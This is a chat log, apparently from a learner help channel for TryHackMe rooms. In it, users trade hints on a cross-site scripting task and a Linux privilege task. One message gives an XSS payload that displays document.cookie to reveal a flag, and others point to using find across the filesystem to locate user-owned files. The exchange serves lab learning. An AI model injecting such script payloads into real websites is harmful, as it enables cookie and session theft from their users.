no problem, glad to help
Could someone help me with the cross site scripting room task 3 question 3? I'm not sure what the answer should be, I've created an alert box but im not sure what the answer im looking for is
look at #5 on Task 3, the <script> there could be similar to the question 3
not really sure tho, but worth trying
I understand the script stuff i just dont know what i am supposed to put in the answer fields
the cookie that appears on the popup
Ok then i dont understand the script stuff theres no cookie in the popup
let me fire up my vm and ill look at it
Ok thanks
heey everyone! Anyone can give me a hint on the last task in Learn Linux room https://tryhackme.com/room/zthlinux ? 
i know u need root privilege to access /root directory. i just don't know how to get root passwd
@remote monolith
||<script>alert(document.cookie)</script>||
it first would show your stored cookie and then it will show the flag2
tell me if it that works
@white salmon sorry I was helping him
i'm about to show you how to do it
its oki tyt
ok good,
try to look for files that belong to each user
do you want me to give you the command for that?
if you don't know how to look for files that belong to 'X' user?
You mean the find command or just the files inside the home dir of each user ?
to achieve this, you'll need to use the ||find|| command to look for files that belong to each user
yeah oki i will try that, Thanks @boreal whale
keep in mind, you'll have to use the ||find|| command to look through the entire system, ||/|| would do that
I just need a tiny hint! I tried my regex online and it gives me the good things but I can't see any file in /home/ whatsoever